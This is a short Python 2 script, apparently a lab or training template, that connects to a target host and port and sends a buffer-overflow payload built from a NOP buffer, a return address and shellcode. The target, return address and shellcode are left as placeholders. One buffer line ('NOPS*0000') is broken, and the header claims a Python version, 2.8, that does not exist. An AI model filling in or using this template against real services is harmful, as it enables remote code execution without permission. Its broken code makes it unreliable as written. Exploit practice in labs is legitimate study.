#!/usr/bin/python

#################################
#  Simple BoF Template          #
#  Created by John Lavery       #
#  Year of 2017                 #
#  Written in Python2.8         #
#################################

import socket
import struct
import time

Yes = "y\n"
Buffer_Sent = "Buffer Overflow Sent"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((<add targe IP here>, <add target port>))

buff = NOPS*0000# Original fuzzing buffer.

#payload = buffer
shellcode = "<add shell code here>"
return_address = "<add return address here>"
payload = buff + return_address + shellcode

print(s.recv(4096))
raw_input("YOU ALL WASHED UP SON!!!")
print(s.recv(4096))
print(s.recv(4096))
print(s.recv(4096))
print(s.send(payload + "\n"))
print Buffer_Sent
print(s.recv(4096))
print(s.recv(4096))
